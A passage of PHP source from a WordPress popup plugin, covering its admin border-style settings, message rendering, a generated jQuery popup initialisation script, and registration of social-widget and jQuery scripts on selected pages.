              <option value="solid" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'solid' ? 'selected="selected"': ''; ?>>solid</option>

              <option value="dotted" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'dotted' ? 'selected="selected"': ''; ?>>dotted</option>

              <option value="dashed" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'dashed' ? 'selected="selected"': ''; ?>>dashed</option>

              <option value="double" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'double' ? 'selected="selected"': ''; ?>>double</option>

              <option value="groove" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'groove' ? 'selected="selected"': ''; ?>>groove</option>

              <option value="ridge" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'ridge' ? 'selected="selected"': ''; ?>>ridge</option>

              <option value="inset" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'inset' ? 'selected="selected"': ''; ?>>inset</option>

              <option value="outset" <?php print get_option(pd_get_target_prefix().'se_border_type', 'solid') == 'outset' ? 'selected="selected"': ''; ?>>outset</option>

            </select>

          </td>

        </tr>

        <tr valign="top">

          <td>Popup Border Color</td>

          <td>

            <input type="text" class="color" name="se_border_color" id="se_border_color" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_border_color', '#000000'); ?>" />

          </td>

        </tr>

        <tr valign="top">

          <td>Popup Border Width</td>

          <td><input type="text" name="se_border_width" size="50" value="<?php echo get_option(pd_get_target_prefix().'se_border_width', '3'); ?>" /></td>

        </tr>

    </table>

    <br />

    </fieldset>

    <br />

    <p class="submit">

      <input type="submit" class="button-primary" value="<?php _e('Save Changes') ?>" />

    </p>

   </form>

    <?php

  

}



function se_get_main_content($variable_name) {

    ob_start();

    $message_content = get_option($variable_name, '');

    if (function_exists('traffic_player_advanced_render_content')) {

      $message_content = str_replace('\'', '"', $message_content);

      $message_content = traffic_player_advanced_render_content($message_content);

    }



    if (function_exists('traffic_player_pro_render_content')) {

      $message_content = str_replace('\'', '"', $message_content);

      $message_content = traffic_player_pro_render_content($message_content);

    }



    if (function_exists('traffic_plugin_render_content')) {

      $message_content = str_replace('\'', '"', $message_content);

      $message_content = traffic_plugin_render_content($message_content);

    }



    if (function_exists('traffic_plugin_free_render_content')) {

      $message_content = str_replace('\'', '"', $message_content);

      $message_content = traffic_plugin_free_render_content($message_content);

    }

    ob_clean();



  return $message_content;

}

  

function socialenforcer_handle_js() {

  $possible_se_key = trim(str_replace(get_option('siteurl'), '', 'http://'.$_SERVER["HTTP_HOST"].$_SERVER['REQUEST_URI']), '/');

  $thid_party_urls = get_option('se_thidparty_urls', array());

  if (isset($thid_party_urls['shortcodes'][md5($possible_se_key)])) {

    ?><html><head>

    <?php    

    socialenforcer_addheader('url-'.md5($possible_se_key));

    wp_head();

    ?>

    </head>

    <body style="margin: 0; padding: 0;"><iframe id="popup_deluxe_iframe" style="border: 0; padding: 0; margin: 0;" src="<?php print $thid_party_urls['urls'][md5($possible_se_key)]; ?>" width="100%" height="100%"></iframe></body></html><?php

    die();

  }



  if ($_REQUEST['popup_init']) {

    $dir = dirname(__FILE__);

    $settings_param = ($_REQUEST['param_id'] ? $_REQUEST['param_id'] : '');

    

    

    if (!get_option($settings_param.'se_enabled', false)) {

      $settings_param = '';

    }

    $pd_thidparty_urls = get_option('se_thidparty_urls', array());

    



    if (get_option($settings_param.'se_iframe_himg', '')) {

      $file_name = plugin_dir_path(__FILE__).'images/'.get_option($settings_param.'se_iframe_himg', '');

      if (file_exists($file_name)) {

        list($file_width, $file_height) = getimagesize($file_name);

      }

    }

   

    $message_content = array();

    $message_content[] = se_get_main_content($settings_param.'se_custom_message');

    if (get_option($settings_param.'se_enable_message_two', false)) {

      $message_content[] = se_get_main_content($settings_param.'se_custom_message_two');

    }

    if (get_option($settings_param.'se_enable_message_three', false)) {

      $message_content[] = se_get_main_content($settings_param.'se_custom_message_three');

    }

    



    

    $show_limitation = get_option($settings_param.'se_show_limitation', '');

    if($show_limitation!=''){

        $already_showed = $_COOKIE['popupshowed'];

        if($already_showed ==  $settings_param.'_'.$_REQUEST['mode']){die();}

        if($show_limitation=='session'){

            $time = 0;

        }else{

            $time = $show_limitation;

        }

        setcookie('popupshowed', $settings_param.'_'.$_REQUEST['mode'], time()+$time);

    }

    

  

    shuffle($message_content);

    $message_content = base64_encode(do_shortcode(array_shift($message_content)));

    //$message_content = bin2hex(do_shortcode(array_shift($message_content)));

    //print file_get_contents($dir.'/socialenforcer.js');

    $mode = 'socialenforcer';

    $event = 'jQuery(document).ready(';

    if ($_REQUEST['mode'] == 'exit'){

       $mode.='_exit';

       $event = 'jQuery("a").click(';

    }

    if ($_REQUEST['mode'] == 'top'){

       $mode.='_top';

    }



    ?>

    

<?php echo $event;?>function (event) {



 return jQuery.fn.<?php echo $mode;?>({

    event:event,

    timer: <?php print get_option($settings_param.'se_timer', 1);?>,

    timeout: "<?php print get_option($settings_param.'se_timeout', 5);?>",

    show_limitation: "<?php print get_option($settings_param.'se_show_limitation', '');?>",

    title: "<?php print get_option($settings_param.'se_title');?>",

    message: "<?php print $message_content;?>",

    google_url: '<?php print get_option('siteurl');?>',

    facebook_url: '<?php print get_option('siteurl');?>',

    opacity: '<?php print get_option($settings_param.'se_opacity');?>',

    twitter: '<?php print get_option($settings_param.'se_twitter_enabled');?>',

    googleplus: <?php print get_option($settings_param.'se_google_enabled', 1);?>,

    facebook: <?php print get_option($settings_param.'se_facebook_enabled', 1);?>,

    popup_width: <?php print (int)get_option($settings_param.'se_width', 450);?>,

    popup_top_offset: <?php print (int)get_option($settings_param.'se_top_offset', 250);?>,

    twitter_username: '<?php print get_option($settings_param.'se_twitter_username');?>',

    close_button: '<?php print get_option($settings_param.'se_close_button');?>',

    close_by_click: '<?php print get_option($settings_param.'se_close_by_click');?>',

    close_by_esc: '<?php print get_option($settings_param.'se_close_by_esc');?>',

    border_color: '<?php print get_option($settings_param.'se_border_color');?>',

    border_width: '<?php print get_option($settings_param.'se_border_width');?>',

    title_color: '<?php print get_option($settings_param.'se_title_color');?>',

    title_bg_color: '<?php print get_option($settings_param.'se_title_bg_color');?>',

    content_transaprent: '<?php print get_option($settings_param.'se_content_transparent');?>',

    content_color: '<?php print get_option($settings_param.'se_content_color');?>',

    content_bg_color: '<?php print get_option($settings_param.'se_content_bg_color');?>',

    footer_bg_color: "<?php print get_option($settings_param.'se_footer_bg_color');?>",

    close_link_color: "<?php print get_option($settings_param.'se_close_link_color');?>",

    header: "<?php print get_option($settings_param.'se_header', '1');?>",

    footer: "<?php print get_option($settings_param.'se_footer', '1');?>",

    form_submit: "<?php print get_option($settings_param.'se_form_submit');?>",

    border_type: "<?php print get_option($settings_param.'se_border_type', 'solid');?>",

    siteurl: "<?php print get_option('siteurl');?>",

    iframe_img_height: "<?php print $file_height.'px'; ?>",

    iframe_img_width: "<?php print $file_width.'px'; ?>",

    iframe_background_img: "<?php print get_option($settings_param.'se_iframe_himg', '');?>",

    bg_img: "<?php print get_option($settings_param.'se_bg_img', '');?>",

    bg_img_ptop: "<?php print get_option($settings_param.'se_bg_img_ptop', 0);?>",

    bg_img_pleft: "<?php print get_option($settings_param.'se_bg_img_pleft', 0);?>",

    bg_img_pright: "<?php print get_option($settings_param.'se_bg_img_pright', 0);?>",

    bg_img_pbottom: "<?php print get_option($settings_param.'se_bg_img_pbottom', 0);?>"

  });

  

  

});

    <?php

      die();

  }  

}



function socialenforcer_addheader($param_id = '') {

  global $wp_query;

  $who_call = array();

  $exit_call = array();

  if (!$param_id && get_post_type() == 'page' || get_post_type() == 'post') {

    $post = $wp_query->queried_object;

    $param_id = 'post-'.$post->ID;

  }

  

  



  $base_url = get_option('siteurl').'/wp-content/plugins/popupdeluxe/';

  $show = false;

  

  if (get_option('all_pagesse_enabled', false) || get_option('se_enabled', false)){

        $who_call[]='all_pages';

        $show = true;

  } 

  if (get_option('home_pagese_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') == trim(get_option('siteurl', '/'))) {

        $who_call[]='home_page';

        $show = true;

    }

  } 

  if (get_option('except_home_pagese_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $who_call[]='except_home_page';

        $show = true;

    }

  }

  if (get_option('except_home_page_exitse_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $exit_call[]='except_home_page_exit';

        $show = true;

    }

  }

  

  if (get_option('home_page_exitse_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $exit_call[]='home_page_exit';

        $show = true;

    }

  }

  

  if (get_option('only_pages_exitse_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $exit_call[]='only_pages_exit';

        $show = true;

    }

  }

  

  if (get_option('only_posts_exitse_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $exit_call[]='only_posts_exit';

        $show = true;

    }

  }

  

  if (get_option('only_custom_exitse_enabled', false)) {

    if (trim('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/') != trim(get_option('siteurl', '/'))) {

        $exit_call[]='only_custom_exit';

        $show = true;

    }

  }

  

  

  if (get_option('only_pagesse_enabled', false)) {



    if (get_post_type() == 'page') {

        $who_call[]='only_pages';

        $show = true;

    }

  } 

  if (get_option('only_postsse_enabled', false)) {

    if (get_post_type() == 'post') {

        $who_call[]='only_posts';

        $show = true;

    }

  } 

  if (get_option('only_customse_enabled', false)) {

    if (is_single()) {

        $who_call[]='only_custom';

        $show = true;

    }

  }

  



    if (!$show) {

        $possible_se_key = trim(str_replace(get_option('siteurl'), '', 'http://'.$_SERVER["HTTP_HOST"].$_SERVER['REQUEST_URI']), '/');

        $thid_party_urls = get_option('se_thidparty_urls', array());

        if (isset($thid_party_urls['shortcodes'][md5($possible_se_key)])) {

            $who_call[]='shortcodes';

            $show = true;

        }

    }

  

    if (!$show) {

        $post = $wp_query->queried_object;

        if (get_option('post-'.$post->ID.'se_enabled', false)) {

            $who_call[]='post-'.$post->ID;

            $show = true;

        }

        if (get_option('post-exit-'.$post->ID.'se_enabled', false)) {

            $exit_call[]='post-exit-'.$post->ID;

            $show = true;

        }

    }





  if ($show) {

	echo '<!--';

	echo ' Load by '.implode(', ', $who_call);

	echo '-->'."\n";

	echo '<!--';

	echo ' Exit by '.implode(', ', $exit_call);

	echo '-->'."\n";

    wp_register_style('socialenforcer_css', $base_url.'socialenforcer.css');

    wp_register_script('socialenforcer_base', $base_url.'socialenforcer.js');

    wp_register_script('socialenforcer_plusone', 'https://apis.google.com/js/plusone.js');

    wp_register_script('socialenforcer_fb', 'http://connect.facebook.net/en_US/all.js#xfbml=1');



    if (get_option('se_twitter_enabled', 0)) {

      wp_register_script('socialenforcer_tw', 'http://platform.twitter.com/widgets.js');

      wp_enqueue_script('socialenforcer_tw');

    }



    $file_subpath = md5(__FILE__);

    wp_enqueue_style('socialenforcer_css');



    wp_deregister_script('jquery');

    wp_register_script('jquery', ("http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"), false, '1.4.2', false);

    wp_enqueue_script('jquery');

    if (get_option('se_google_enabled', 0)) {

      wp_enqueue_script('socialenforcer_plusone');

    }

    if (get_option('se_facebook_enabled')) {

      wp_enqueue_script('socialenforcer_fb');

    }

    wp_enqueue_script('socialenforcer_base', false, array('jquery'));

    

    if (get_option($param_id.'se_enabled')) {

        wp_register_script('se_init', trim(get_option('siteurl', '')).'/index.php?popup_init=true&param_id='.$param_id);

    } elseif(sizeof($who_call)>0) {

        wp_register_script('se_init', trim(get_option('siteurl', '')).'/index.php?popup_init=true&param_id='.$who_call[0]);

    }

    

    if(sizeof($exit_call)>0){

        wp_register_script('se_init_exit', trim(get_option('siteurl', '')).'/index.php?popup_init=true&mode=exit&param_id='.$exit_call[0]);

        wp_register_script('se_init_top', trim(get_option('siteurl', '')).'/index.php?popup_init=true&mode=top&param_id='.$exit_call[0]);

    }

    

    

    wp_enqueue_script('se_init');

    wp_enqueue_script('se_init_exit');

    wp_enqueue_script('se_init_top');



  }

}





add_action('wp_footer', 'socialenforcer_addheader', 10);



if (!is_admin() && strpos($_SERVER['SCRIPT_FILENAME'], 'wp-login.php') === false) {

  add_action('plugins_loaded', 'socialenforcer_handle_js', -9000000);

}



if(defined('ABSPATH') && defined('WPINC')) {

  if (is_admin()) {

    add_action('admin_menu', 'socialenforcer_menu');

  }

}